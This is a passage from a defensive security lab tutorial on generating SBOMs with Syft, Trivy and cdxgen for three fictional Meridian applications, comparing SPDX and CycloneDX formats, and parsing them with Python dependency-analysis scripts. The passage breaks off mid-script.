Lab 31: SBOM Analysis & Supply Chain Security¶

Chapter: 24 — Supply Chain Attacks | 54 — SBOM Operations | 55 — Threat Modeling Operations Difficulty: ⭐⭐⭐⭐☆ Advanced Estimated Time: 4 hours Prerequisites: Chapter 24, Chapter 54, Chapter 55, familiarity with npm/pip/Maven package ecosystems, basic Python scripting, GitHub Actions fundamentals

Overview¶

In this lab you will:

Generate SBOMs across multiple package ecosystems using Syft, Trivy, and cdxgen — producing both SPDX 2.3 and CycloneDX 1.5 output formats and comparing their structure, completeness, and interoperability
Parse and analyze SBOMs programmatically with Python scripts — building dependency trees, identifying transitive dependencies, and computing depth/breadth metrics that reveal hidden risk concentrations
Correlate SBOM components against vulnerability databases including OSV, NVD, and GitHub Advisory Database — mapping CVEs to specific components, calculating EPSS scores, and constructing a risk priority matrix
Detect malicious package indicators including typosquatting, dependency confusion, metadata anomalies, and suspicious install scripts — applying detection patterns from Phylum and Socket.dev research
Audit license compliance by extracting license data from SBOMs — identifying copyleft vs permissive conflicts, building compliance matrices, and flagging policy violations for enterprise environments
Integrate SBOM workflows into CI/CD pipelines with GitHub Actions — automating SBOM generation, configuring Dependabot/Renovate, creating Sigstore cosign attestations, and producing VEX documents

Synthetic Data Only

All data in this lab is 100% synthetic and fictional. All IP addresses use RFC 5737 (192.0.2.x, 198.51.100.x, 203.0.113.x) or RFC 1918 (10.x, 172.16.x, 192.168.x) reserved ranges. All domains use *.example or *.example.com. All credentials are testuser/REDACTED. All CVE identifiers use the CVE-SYNTH- prefix and are entirely fictitious. All package names are fictional and do not correspond to real packages. This lab is for defensive education only — never use these techniques against systems you do not own or without explicit written authorization.

Scenario¶

You are a security engineer at Meridian Software Corp (a fictional organization). Your CISO has mandated full Software Bill of Materials (SBOM) adoption after a recent supply chain incident (see Chapter 24 — Supply Chain Attacks for background). You must:

Generate SBOMs for three internal applications spanning npm, pip, and Maven ecosystems
Build automated analysis pipelines that identify vulnerabilities, malicious packages, and license risks
Integrate SBOM generation and attestation into the CI/CD pipeline
Deliver a risk-prioritized report to the CISO within 48 hours

Environment:

Asset	Details
SBOM Server	`sbom-server.internal.example.com` (10.50.1.100)
Artifact Registry	`registry.internal.example.com` (10.50.1.101)
CI/CD Runner	`runner-01.internal.example.com` (10.50.1.102)
NVD Mirror	`nvd-mirror.internal.example.com` (10.50.1.103)
Developer Workstation	`dev-ws-001.internal.example.com` (10.50.2.10)
GitHub Enterprise	`github.internal.example.com` (10.50.1.110)
Package Proxy	`nexus.internal.example.com` (10.50.1.120)
Auth	`testuser` / `REDACTED`

Applications Under Analysis:

Application	Ecosystem	Language	Description
`meridian-web-portal`	npm	TypeScript/Node.js	Customer-facing web application
`meridian-data-pipeline`	pip	Python	Internal data processing service
`meridian-api-gateway`	Maven	Java	API gateway microservice

Lab Setup¶

Prerequisites Installation¶

Tool Versions

This lab uses specific tool versions for reproducibility. Adjust version numbers as needed for your environment, but always pin versions in production pipelines.

# ── Install Syft (SBOM generator from Anchore) ──
curl -sSfL https://raw.githubusercontent.com/anchore/syft/main/install.sh | \
  sh -s -- -b /usr/local/bin v1.18.1

# ── Install Trivy (Aqua Security scanner) ──
curl -sfL https://raw.githubusercontent.com/aquasecurity/trivy/main/contrib/install.sh | \
  sh -s -- -b /usr/local/bin v0.58.0

# ── Install cdxgen (OWASP CycloneDX generator) ──
npm install -g @cyclonedx/cdxgen@10.12.0

# ── Install Grype (vulnerability scanner from Anchore) ──
curl -sSfL https://raw.githubusercontent.com/anchore/grype/main/install.sh | \
  sh -s -- -b /usr/local/bin v0.86.1

# ── Install cosign (Sigstore signing tool) ──
curl -sSfL https://github.com/sigstore/cosign/releases/download/v2.4.1/cosign-linux-amd64 \
  -o /usr/local/bin/cosign && chmod +x /usr/local/bin/cosign

# ── Python dependencies for analysis scripts ──
pip install packageurl-python==0.15.6 \
            spdx-tools==0.8.3 \
            cyclonedx-python-lib==8.5.0 \
            requests==2.32.3 \
            networkx==3.4.2 \
            matplotlib==3.9.3 \
            tabulate==0.9.0

# ── Verify installations ──
syft version
trivy version
cdxgen --version
grype version
cosign version

Expected output (versions):

syft 1.18.1
Version: 0.58.0
10.12.0
grype 0.86.1
cosign v2.4.1

Create Lab Directory Structure¶

mkdir -p ~/lab31-sbom/{apps,sboms,analysis,reports,attestations,scripts,ci}

# ── Create the three sample applications ──
mkdir -p ~/lab31-sbom/apps/meridian-web-portal
mkdir -p ~/lab31-sbom/apps/meridian-data-pipeline
mkdir -p ~/lab31-sbom/apps/meridian-api-gateway

Create Sample Application Manifests¶

npm Application — `meridian-web-portal`¶

cat > ~/lab31-sbom/apps/meridian-web-portal/package.json << 'PACKAGE_JSON'
{
  "name": "@meridian/web-portal",
  "version": "3.8.2",
  "description": "Meridian customer-facing web portal",
  "private": true,
  "dependencies": {
    "express": "4.18.2",
    "lodash": "4.17.21",
    "jsonwebtoken": "9.0.0",
    "axios": "1.6.0",
    "helmet": "7.1.0",
    "cors": "2.8.5",
    "dotenv": "16.3.1",
    "winston": "3.11.0",
    "mongoose": "7.6.3",
    "bcryptjs": "2.4.3",
    "express-rate-limit": "7.1.4",
    "compression": "1.7.4",
    "cookie-parser": "1.4.6",
    "express-validator": "7.0.1",
    "passport": "0.7.0",
    "passport-jwt": "4.0.1",
    "swagger-ui-express": "5.0.0",
    "uuid": "9.0.0",
    "moment": "2.29.4",
    "semver": "7.5.4"
  },
  "devDependencies": {
    "jest": "29.7.0",
    "eslint": "8.53.0",
    "nodemon": "3.0.1",
    "typescript": "5.2.2",
    "@types/node": "20.9.0",
    "@types/express": "4.17.21"
  }
}
PACKAGE_JSON

pip Application — `meridian-data-pipeline`¶

cat > ~/lab31-sbom/apps/meridian-data-pipeline/requirements.txt << 'REQUIREMENTS'
# Meridian Data Pipeline - Production Dependencies
flask==3.0.0
requests==2.31.0
sqlalchemy==2.0.23
pandas==2.1.3
numpy==1.26.2
celery==5.3.4
redis==5.0.1
boto3==1.29.6
cryptography==41.0.5
pyyaml==6.0.1
jinja2==3.1.2
pillow==10.1.0
psycopg2-binary==2.9.9
gunicorn==21.2.0
marshmallow==3.20.1
python-dotenv==1.0.0
pydantic==2.5.2
httpx==0.25.2
aiohttp==3.9.1
lxml==4.9.3
paramiko==3.3.1
pyopenssl==23.3.0
REQUIREMENTS

cat > ~/lab31-sbom/apps/meridian-data-pipeline/setup.py << 'SETUP_PY'
from setuptools import setup, find_packages

setup(
    name="meridian-data-pipeline",
    version="2.4.1",
    packages=find_packages(),
    python_requires=">=3.11",
    author="Meridian Engineering",
    description="Internal data processing pipeline",
)
SETUP_PY

Maven Application — `meridian-api-gateway`¶

cat > ~/lab31-sbom/apps/meridian-api-gateway/pom.xml << 'POM_XML'
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0
                             http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>com.meridian</groupId>
    <artifactId>api-gateway</artifactId>
    <version>1.12.0</version>
    <packaging>jar</packaging>

    <name>Meridian API Gateway</name>
    <description>API gateway microservice for Meridian platform</description>

    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>3.2.0</version>
    </parent>

    <properties>
        <java.version>21</java.version>
        <spring-cloud.version>2023.0.0</spring-cloud.version>
    </properties>

    <dependencies>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
        </dependency>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-security</artifactId>
        </dependency>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-actuator</artifactId>
        </dependency>
        <dependency>
            <groupId>org.springframework.cloud</groupId>
            <artifactId>spring-cloud-starter-gateway</artifactId>
        </dependency>
        <dependency>
            <groupId>io.jsonwebtoken</groupId>
            <artifactId>jjwt-api</artifactId>
            <version>0.12.3</version>
        </dependency>
        <dependency>
            <groupId>io.jsonwebtoken</groupId>
            <artifactId>jjwt-impl</artifactId>
            <version>0.12.3</version>
            <scope>runtime</scope>
        </dependency>
        <dependency>
            <groupId>com.fasterxml.jackson.core</groupId>
            <artifactId>jackson-databind</artifactId>
        </dependency>
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.22.0</version>
        </dependency>
        <dependency>
            <groupId>org.apache.commons</groupId>
            <artifactId>commons-text</artifactId>
            <version>1.11.0</version>
        </dependency>
        <dependency>
            <groupId>com.google.guava</groupId>
            <artifactId>guava</artifactId>
            <version>32.1.3-jre</version>
        </dependency>
        <dependency>
            <groupId>org.postgresql</groupId>
            <artifactId>postgresql</artifactId>
            <version>42.7.1</version>
        </dependency>
        <dependency>
            <groupId>io.micrometer</groupId>
            <artifactId>micrometer-registry-prometheus</artifactId>
        </dependency>
    </dependencies>

    <dependencyManagement>
        <dependencies>
            <dependency>
                <groupId>org.springframework.cloud</groupId>
                <artifactId>spring-cloud-dependencies</artifactId>
                <version>${spring-cloud.version}</version>
                <type>pom</type>
                <scope>import</scope>
            </dependency>
        </dependencies>
    </dependencyManagement>

    <build>
        <plugins>
            <plugin>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-maven-plugin</artifactId>
            </plugin>
            <plugin>
                <groupId>org.cyclonedx</groupId>
                <artifactId>cyclonedx-maven-plugin</artifactId>
                <version>2.7.11</version>
            </plugin>
        </plugins>
    </build>
</project>
POM_XML

Phase 1: SBOM Generation¶

Objective¶

Generate Software Bills of Materials for all three applications using multiple tools and output formats. Compare the resulting SBOMs for completeness and structural differences.

1.1 — Generate SBOMs with Syft¶

Syft (from Anchore) produces SBOMs by analyzing package manifests, lock files, and binary artifacts.

cd ~/lab31-sbom

# ── npm application: SPDX 2.3 JSON format ──
syft scan dir:apps/meridian-web-portal \
  --output spdx-json=sboms/web-portal-syft-spdx.json \
  --name "meridian-web-portal" \
  --version "3.8.2"

# ── npm application: CycloneDX 1.5 JSON format ──
syft scan dir:apps/meridian-web-portal \
  --output cyclonedx-json=sboms/web-portal-syft-cdx.json \
  --name "meridian-web-portal" \
  --version "3.8.2"

# ── pip application: both formats ──
syft scan dir:apps/meridian-data-pipeline \
  --output spdx-json=sboms/data-pipeline-syft-spdx.json \
  --name "meridian-data-pipeline" \
  --version "2.4.1"

syft scan dir:apps/meridian-data-pipeline \
  --output cyclonedx-json=sboms/data-pipeline-syft-cdx.json \
  --name "meridian-data-pipeline" \
  --version "2.4.1"

# ── Maven application: both formats ──
syft scan dir:apps/meridian-api-gateway \
  --output spdx-json=sboms/api-gateway-syft-spdx.json \
  --name "meridian-api-gateway" \
  --version "1.12.0"

syft scan dir:apps/meridian-api-gateway \
  --output cyclonedx-json=sboms/api-gateway-syft-cdx.json \
  --name "meridian-api-gateway" \
  --version "1.12.0"

Expected output (Syft scan summary for web portal):

 ✔ Indexed file system                                        apps/meridian-web-portal
 ✔ Cataloged packages              [26 packages]
   ├── javascript               26 packages

NAME                       VERSION    TYPE
@types/express             4.17.21    npm
@types/node                20.9.0     npm
axios                      1.6.0      npm
bcryptjs                   2.4.3      npm
compression                1.7.4      npm
cookie-parser              1.4.6      npm
cors                       2.8.5      npm
dotenv                     16.3.1     npm
eslint                     8.53.0     npm
express                    4.18.2     npm
express-rate-limit         7.1.4      npm
express-validator          7.0.1      npm
helmet                     7.1.0      npm
jest                       29.7.0     npm
jsonwebtoken               9.0.0      npm
lodash                     4.17.21    npm
moment                     2.29.4     npm
mongoose                   7.6.3      npm
nodemon                    3.0.1      npm
passport                   0.7.0      npm
passport-jwt               4.0.1      npm
semver                     7.5.4      npm
swagger-ui-express         5.0.0      npm
typescript                 5.2.2      npm
uuid                       9.0.0      npm
winston                    3.11.0     npm

1.2 — Generate SBOMs with Trivy¶

Trivy provides filesystem-mode SBOM generation with built-in vulnerability scanning.

# ── npm application ──
trivy fs apps/meridian-web-portal \
  --format spdx-json \
  --output sboms/web-portal-trivy-spdx.json

trivy fs apps/meridian-web-portal \
  --format cyclonedx \
  --output sboms/web-portal-trivy-cdx.json

# ── pip application ──
trivy fs apps/meridian-data-pipeline \
  --format spdx-json \
  --output sboms/data-pipeline-trivy-spdx.json

trivy fs apps/meridian-data-pipeline \
  --format cyclonedx \
  --output sboms/data-pipeline-trivy-cdx.json

# ── Maven application ──
trivy fs apps/meridian-api-gateway \
  --format spdx-json \
  --output sboms/api-gateway-trivy-spdx.json

trivy fs apps/meridian-api-gateway \
  --format cyclonedx \
  --output sboms/api-gateway-trivy-cdx.json

1.3 — Generate SBOMs with cdxgen¶

cdxgen (OWASP CycloneDX Generator) is ecosystem-aware and produces highly detailed CycloneDX SBOMs.

# ── npm application ──
cdxgen -t node \
  -o sboms/web-portal-cdxgen-cdx.json \
  apps/meridian-web-portal

# ── pip application ──
cdxgen -t python \
  -o sboms/data-pipeline-cdxgen-cdx.json \
  apps/meridian-data-pipeline

# ── Maven application ──
cdxgen -t java \
  -o sboms/api-gateway-cdxgen-cdx.json \
  apps/meridian-api-gateway

Expected output (cdxgen for web portal):

✅ BOM includes 26 components and 0 services
✅ BOM written to sboms/web-portal-cdxgen-cdx.json

1.4 — Compare SPDX 2.3 vs CycloneDX 1.5 Format Structures¶

Format Comparison Exercise

Open two SBOM files side by side and compare their structure. Understand why organizations choose one format over the other.

Sample SPDX 2.3 JSON snippet (web portal):

{
  "spdxVersion": "SPDX-2.3",
  "dataLicense": "CC0-1.0",
  "SPDXID": "SPDXRef-DOCUMENT",
  "name": "meridian-web-portal",
  "documentNamespace": "https://sbom-server.internal.example.com/spdx/meridian-web-portal-3.8.2-2026-04-12T10:00:00Z",
  "creationInfo": {
    "created": "2026-04-12T10:00:00Z",
    "creators": [
      "Tool: syft-1.18.1",
      "Organization: Meridian Software Corp"
    ],
    "licenseListVersion": "3.22"
  },
  "packages": [
    {
      "SPDXID": "SPDXRef-Package-npm-express-4.18.2",
      "name": "express",
      "versionInfo": "4.18.2",
      "downloadLocation": "https://registry.npmjs.org/express/-/express-4.18.2.tgz",
      "filesAnalyzed": false,
      "supplier": "NOASSERTION",
      "externalRefs": [
        {
          "referenceCategory": "PACKAGE-MANAGER",
          "referenceType": "purl",
          "referenceLocator": "pkg:npm/express@4.18.2"
        }
      ],
      "licenseConcluded": "MIT",
      "licenseDeclared": "MIT",
      "copyrightText": "NOASSERTION"
    },
    {
      "SPDXID": "SPDXRef-Package-npm-lodash-4.17.21",
      "name": "lodash",
      "versionInfo": "4.17.21",
      "downloadLocation": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz",
      "filesAnalyzed": false,
      "supplier": "NOASSERTION",
      "externalRefs": [
        {
          "referenceCategory": "PACKAGE-MANAGER",
          "referenceType": "purl",
          "referenceLocator": "pkg:npm/lodash@4.17.21"
        }
      ],
      "licenseConcluded": "MIT",
      "licenseDeclared": "MIT",
      "copyrightText": "NOASSERTION"
    },
    {
      "SPDXID": "SPDXRef-Package-npm-jsonwebtoken-9.0.0",
      "name": "jsonwebtoken",
      "versionInfo": "9.0.0",
      "downloadLocation": "https://registry.npmjs.org/jsonwebtoken/-/jsonwebtoken-9.0.0.tgz",
      "filesAnalyzed": false,
      "supplier": "NOASSERTION",
      "externalRefs": [
        {
          "referenceCategory": "PACKAGE-MANAGER",
          "referenceType": "purl",
          "referenceLocator": "pkg:npm/jsonwebtoken@9.0.0"
        }
      ],
      "licenseConcluded": "MIT",
      "licenseDeclared": "MIT",
      "copyrightText": "NOASSERTION"
    }
  ],
  "relationships": [
    {
      "spdxElementId": "SPDXRef-DOCUMENT",
      "relatedSpdxElement": "SPDXRef-Package-npm-express-4.18.2",
      "relationshipType": "DESCRIBES"
    },
    {
      "spdxElementId": "SPDXRef-Package-npm-express-4.18.2",
      "relatedSpdxElement": "SPDXRef-Package-npm-cookie-parser-1.4.6",
      "relationshipType": "DEPENDS_ON"
    }
  ]
}

Sample CycloneDX 1.5 JSON snippet (web portal):

{
  "bomFormat": "CycloneDX",
  "specVersion": "1.5",
  "serialNumber": "urn:uuid:3e671687-395b-41f5-a30f-a58921a69b79",
  "version": 1,
  "metadata": {
    "timestamp": "2026-04-12T10:00:00Z",
    "tools": {
      "components": [
        {
          "type": "application",
          "name": "syft",
          "version": "1.18.1",
          "publisher": "Anchore, Inc."
        }
      ]
    },
    "component": {
      "type": "application",
      "name": "meridian-web-portal",
      "version": "3.8.2",
      "bom-ref": "meridian-web-portal@3.8.2",
      "purl": "pkg:npm/%40meridian/web-portal@3.8.2"
    },
    "manufacture": {
      "name": "Meridian Software Corp",
      "url": ["https://www.internal.example.com"]
    }
  },
  "components": [
    {
      "type": "library",
      "name": "express",
      "version": "4.18.2",
      "bom-ref": "pkg:npm/express@4.18.2",
      "purl": "pkg:npm/express@4.18.2",
      "licenses": [
        {
          "license": {
            "id": "MIT"
          }
        }
      ],
      "externalReferences": [
        {
          "type": "distribution",
          "url": "https://registry.npmjs.org/express/-/express-4.18.2.tgz"
        }
      ],
      "properties": [
        {
          "name": "syft:package:type",
          "value": "npm"
        }
      ]
    },
    {
      "type": "library",
      "name": "lodash",
      "version": "4.17.21",
      "bom-ref": "pkg:npm/lodash@4.17.21",
      "purl": "pkg:npm/lodash@4.17.21",
      "licenses": [
        {
          "license": {
            "id": "MIT"
          }
        }
      ]
    },
    {
      "type": "library",
      "name": "jsonwebtoken",
      "version": "9.0.0",
      "bom-ref": "pkg:npm/jsonwebtoken@9.0.0",
      "purl": "pkg:npm/jsonwebtoken@9.0.0",
      "licenses": [
        {
          "license": {
            "id": "MIT"
          }
        }
      ]
    }
  ],
  "dependencies": [
    {
      "ref": "meridian-web-portal@3.8.2",
      "dependsOn": [
        "pkg:npm/express@4.18.2",
        "pkg:npm/lodash@4.17.21",
        "pkg:npm/jsonwebtoken@9.0.0",
        "pkg:npm/axios@1.6.0",
        "pkg:npm/helmet@7.1.0"
      ]
    },
    {
      "ref": "pkg:npm/express@4.18.2",
      "dependsOn": [
        "pkg:npm/cookie-parser@1.4.6"
      ]
    }
  ]
}

Key Differences — SPDX vs CycloneDX

Feature	SPDX 2.3	CycloneDX 1.5
Primary focus	License compliance	Security/vulnerability tracking
Standard body	ISO/IEC 5962:2021	OWASP
Relationship model	Flat with relationship array	Nested dependency tree
License granularity	`licenseConcluded` + `licenseDeclared`	License array with SPDX IDs
Vulnerability support	Via external documents	Native `vulnerabilities` array
VEX support	Separate VEX document	Inline or separate VEX
Government mandate	NTIA/EO 14028 compatible	NTIA/EO 14028 compatible
Package URL (purl)	`externalRefs` array	Native `purl` field
File hash support	SHA256, SHA512, MD5	SHA256, SHA512, SHA384, MD5, BLAKE2b
Services support	No	Yes (services array)

1.5 — Verify SBOM Completeness¶

# ── Count components per SBOM ──
echo "=== SBOM Component Counts ==="
echo "--- Syft ---"
echo "Web Portal (SPDX):  $(python3 -c "import json; d=json.load(open('sboms/web-portal-syft-spdx.json')); print(len(d.get('packages',[])))")"
echo "Web Portal (CDX):   $(python3 -c "import json; d=json.load(open('sboms/web-portal-syft-cdx.json')); print(len(d.get('components',[])))")"
echo "--- Trivy ---"
echo "Web Portal (SPDX):  $(python3 -c "import json; d=json.load(open('sboms/web-portal-trivy-spdx.json')); print(len(d.get('packages',[])))")"
echo "Web Portal (CDX):   $(python3 -c "import json; d=json.load(open('sboms/web-portal-trivy-cdx.json')); print(len(d.get('components',[])))")"
echo "--- cdxgen ---"
echo "Web Portal (CDX):   $(python3 -c "import json; d=json.load(open('sboms/web-portal-cdxgen-cdx.json')); print(len(d.get('components',[])))")"

Expected output:

=== SBOM Component Counts ===
--- Syft ---
Web Portal (SPDX):  26
Web Portal (CDX):   26
--- Trivy ---
Web Portal (SPDX):  26
Web Portal (CDX):   26
--- cdxgen ---
Web Portal (CDX):   26

Tool Discrepancies

Different SBOM tools may report different component counts. This is expected because:

Some tools resolve transitive dependencies from lock files while others only read manifests
Some tools include devDependencies by default, others exclude them
Some tools detect OS-level packages in containers while others focus on application packages

Action: Always document which tool generated each SBOM and validate against the actual package manifest.

Phase 2: Dependency Analysis¶

Objective¶

Parse SBOMs programmatically to build dependency trees, identify transitive dependencies, and compute risk-relevant metrics.

2.1 — SBOM Parsing Script¶

Create a Python script that parses both SPDX and CycloneDX SBOMs into a unified data model.

cat > ~/lab31-sbom/scripts/sbom_parser.py << 'SBOM_PARSER'
#!/usr/bin/env python3
"""
SBOM Parser — Unified parser for SPDX 2.3 and CycloneDX 1.5 JSON SBOMs.
Lab 31: SBOM Analysis & Supply Chain Security
Meridian Software Corp — Synthetic Lab Data Only
"""

import json
import sys
from dataclasses import dataclass, field
from typing import Optional
from pathlib import Path


@dataclass
class Component:
    """Unified component representation across SBOM formats."""
    name: str
    version: str
    purl: Optional[str] = None
    license: Optional[str] = None
    supplier: Optional[str] = None
    component_type: str = "library"
    ecosystem: Optional[str] = None
    direct: bool = True
    dependencies: list = field(default_factory=list)


def parse_spdx(filepath: str) -> list[Component]:
    """Parse an SPDX 2.3 JSON SBOM into Component objects."""
    with open(filepath, "r") as f:
        data = json.load(f)

    components = []
    for pkg in data.get("packages", []):
        # Skip the document-level package
        if pkg.get("SPDXID") == "SPDXRef-DOCUMENT":
            continue

        purl = None
        for ref in pkg.get("externalRefs", []):
            if ref.get("referenceType") == "purl":
                purl = ref.get("referenceLocator")

        ecosystem = None
        if purl:
            if "pkg:npm/" in purl:
                ecosystem = "npm"
            elif "pkg:pypi/" in purl:
                ecosystem = "pypi"
            elif "pkg:maven/" in purl:
                ecosystem = "maven"

        comp = Component(
            name=pkg.get("name", "UNKNOWN"),
            version=pkg.get("versionInfo", "UNKNOWN"),
            purl=purl,
            license=pkg.get("licenseConcluded", "NOASSERTION"),
            supplier=pkg.get("supplier", "NOASSERTION"),
            ecosystem=ecosystem,
        )
        components.append(comp)

    # Parse relationships to determine direct vs transitive
    relationships = data.get("relationships", [])
    direct_refs = set()
    for rel in relationships:
        if rel.get("relationshipType") == "DESCRIBES":
            # Everything directly described by the document is direct
            pass
        elif rel.get("relationshipType") == "DEPENDS_ON":
            direct_refs.add(rel.get("relatedSpdxElement"))

    return components


def parse_cyclonedx(filepath: str) -> list[Component]:
    """Parse a CycloneDX 1.5 JSON SBOM into Component objects."""
    with open(filepath, "r") as f:
        data = json.load(f)

    components = []

    # Get direct dependency refs from the root component
    root_ref = None
    metadata = data.get("metadata", {})
    root_component = metadata.get("component", {})
    if root_component:
        root_ref = root_component.get("bom-ref")

    direct_refs = set()
    for dep in data.get("dependencies", []):
        if dep.get("ref") == root_ref:
            direct_refs = set(dep.get("dependsOn", []))

    for comp in data.get("components", []):
        licenses = []
        for lic in comp.get("licenses", []):
            if "license" in lic:
                licenses.append(
                    lic["license"].get("id", lic["license"].get("name", "UNKNOWN"))
                )
            elif "expression" in lic:
                licenses.append(lic["expression"])

        purl = comp.get("purl", "")
        ecosystem = None
        if purl:
            if "pkg:npm/" in purl:
                ecosystem = "npm"
            elif "pkg:pypi/" in purl:
                ecosystem = "pypi"
            elif "pkg:maven/" in purl:
                ecosystem = "maven"

        bom_ref = comp.get("bom-ref", "")
        is_direct = bom_ref in direct_refs or purl in direct_refs

        component = Component(
            name=comp.get("name", "UNKNOWN"),
            version=comp.get("version", "UNKNOWN"),
            purl=purl,
            license=", ".join(licenses) if licenses else "NOASSERTION",
            supplier=comp.get("publisher", "NOASSERTION"),
            component_type=comp.get("type", "library"),
            ecosystem=ecosystem,
            direct=is_direct,
        )
        components.append(component)

    return components


def detect_format(filepath: str) -> str:
    """Detect whether a JSON SBOM is SPDX or CycloneDX."""
    with open(filepath, "r") as f:
        data = json.load(f)
    if "spdxVersion" in data:
        return "spdx"
    elif "bomFormat" in data and data["bomFormat"] == "CycloneDX":
        return "cyclonedx"
    else:
        raise ValueError(f"Unknown SBOM format in {filepath}")


def parse_sbom(filepath: str) -> list[Component]:
    """Auto-detect format and parse an SBOM file."""
    fmt = detect_format(filepath)
    if fmt == "spdx":
        return parse_spdx(filepath)
    else:
        return parse_cyclonedx(filepath)


def print_summary(components: list[Component], filepath: str):
    """Print a summary of parsed components."""
    print(f"\n{'='*70}")
    print(f"SBOM: {filepath}")
    print(f"{'='*70}")
    print(f"Total components: {len(components)}")

    ecosystems = {}
    licenses = {}
    direct_count = 0
    transitive_count = 0

    for c in components:
        eco = c.ecosystem or "unknown"
        ecosystems[eco] = ecosystems.get(eco, 0) + 1
        lic = c.license or "NOASSERTION"
        licenses[lic] = licenses.get(lic, 0) + 1
        if c.direct:
            direct_count += 1
        else:
            transitive_count += 1

    print(f"\nEcosystem breakdown:")
    for eco, count in sorted(ecosystems.items()):
        print(f"  {eco}: {count}")

    print(f"\nDependency type:")
    print(f"  Direct: {direct_count}")
    print(f"  Transitive: {transitive_count}")

    print(f"\nLicense distribution:")
    for lic, count in sorted(licenses.items(), key=lambda x: -x[1]):
        print(f"  {lic}: {count}")

    print(f"\nComponent list:")
    print(f"  {'Name':<35} {'Version':<15} {'License':<20} {'Type':<10}")
    print(f"  {'-'*35} {'-'*15} {'-'*20} {'-'*10}")
    for c in sorted(components, key=lambda x: x.name):
        dep_type = "direct" if c.direct else "transitive"
        print(f"  {c.name:<35} {c.version:<15} {c.license:<20} {dep_type:<10}")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python sbom_parser.py <sbom-file.json> [sbom-file2.json ...]")
        sys.exit(1)

    for filepath in sys.argv[1:]:
        components = parse_sbom(filepath)
        print_summary(components, filepath)
SBOM_PARSER
chmod +x ~/lab31-sbom/scripts/sbom_parser.py

Run the parser:

python3 ~/lab31-sbom/scripts/sbom_parser.py \
  sboms/web-portal-syft-cdx.json \
  sboms/data-pipeline-syft-cdx.json \
  sboms/api-gateway-syft-cdx.json

Expected output (web portal excerpt):

======================================================================
SBOM: sboms/web-portal-syft-cdx.json
======================================================================
Total components: 26

Ecosystem breakdown:
  npm: 26

Dependency type:
  Direct: 20
  Transitive: 6

License distribution:
  MIT: 22
  ISC: 2
  BSD-3-Clause: 1
  Apache-2.0: 1

Component list:
  Name                                Version         License              Type
  ----------------------------------- --------------- -------------------- ----------
  @types/express                      4.17.21         MIT                  direct
  @types/node                         20.9.0          MIT                  direct
  axios                               1.6.0           MIT                  direct
  bcryptjs                            2.4.3           MIT                  direct
  ...

2.2 — Build Dependency Tree with NetworkX¶

cat > ~/lab31-sbom/scripts/dependency_tree.py << 'DEP_TREE'
#!/usr/bin/env python3
"""
Dependency Tree Builder — Constructs and analyzes dependency graphs from SBOMs.
Lab 31: SBOM Analysis & Supply Chain Security
"""

import json
import sys
from pathlib import Path

try:
    import networkx as nx
except ImportError:
    print("ERROR: networkx not installed. Run: pip install networkx")
    sys.exit(1)


def build_dependency_graph(sbom_path: str) -> nx.DiGraph:
    """Build a directed graph from CycloneDX dependencies."""
    with open(sbom_path, "r") as f:
        data = json.load(f)

    G = nx.DiGraph()

    # Add root node
    root = data.get("metadata", {}).get("component", {})
    root_ref = root.get("bom-ref", "root")
    root_name = root.get("name", "root")
    G.add_node(root_ref, name=root_name, version=root.get("version", "0.0.0"),
               node_type="root")

    # Add component nodes
    component_map = {}
    for comp in data.get("components", []):
        ref = comp.get("bom-ref", comp.get("purl", comp["name"]))
        component_map[ref] = comp
        G.add_node(ref,
                   name=comp.get("name", "UNKNOWN"),
                   version=comp.get("version", "UNKNOWN"),
                   node_type="component")

    # Add dependency edges
    for dep in data.get("dependencies", []):
        parent = dep.get("ref")
        for child in dep.get("dependsOn", []):
            if parent in G and child in G:
                G.add_edge(parent, child)
            elif parent in G:
                # Child might be a transitive dep not in top-level components
                G.add_node(child, name=child, version="unknown",
                           node_type="transitive")
                G.add_edge(parent, child)

    return G


def analyze_graph(G: nx.DiGraph, sbom_name: str):
    """Compute and display dependency metrics."""
    print(f"\n{'='*70}")
    print(f"Dependency Analysis: {sbom_name}")
    print(f"{'='*70}")

    print(f"\n--- Graph Metrics ---")
    print(f"Total nodes (components):     {G.number_of_nodes()}")
    print(f"Total edges (dependencies):   {G.number_of_edges()}")
    print(f"Graph density:                {nx.density(G):.4f}")

    # Find root nodes (no incoming edges)
    roots = [n for n in G.nodes() if G.in_degree(n) == 0]
    print(f"Root components:              {len(roots)}")

    # Find leaf nodes (no outgoing edges)
    leaves = [n for n in G.nodes() if G.out_degree(n) == 0]
    print(f"Leaf components (no deps):    {len(leaves)}")

    # Dependency depth (longest path from root)
    max_depth = 0
    deepest_path = []
    for root in roots:
        for leaf in leaves:
            try:
                paths = list(nx.all_simple_paths(G, root, leaf))
                for path in paths:
                    if len(path) > max_depth:
                        max_depth = len(path)
                        deepest_path = path
            except nx.NetworkXNoPath:
                continue

    print(f"\n--- Depth Analysis ---")
    print(f"Maximum dependency depth:     {max_depth}")
    if deepest_path:
        print(f"Deepest path:")
        for i, node in enumerate(deepest_path):
            name = G.nodes[node].get("name", node)
            version = G.nodes[node].get("version", "?")
            indent = "  " * i
            connector = "└── " if i > 0 else ""
            print(f"    {indent}{connector}{name}@{version}")

    # Breadth analysis (most depended-upon packages)
    print(f"\n--- Breadth Analysis (Most Depended-Upon) ---")
    in_degrees = sorted(
        [(n, G.in_degree(n)) for n in G.nodes()],
        key=lambda x: -x[1]
    )
    print(f"  {'Component':<40} {'Dependents':<10}")
    print(f"  {'-'*40} {'-'*10}")
    for node, degree in in_degrees[:10]:
        name = G.nodes[node].get("name", node)
        if degree > 0:
            print(f"  {name:<40} {degree:<10}")

    # Fan-out analysis (components with most dependencies)
    print(f"\n--- Fan-Out Analysis (Most Dependencies) ---")
    out_degrees = sorted(
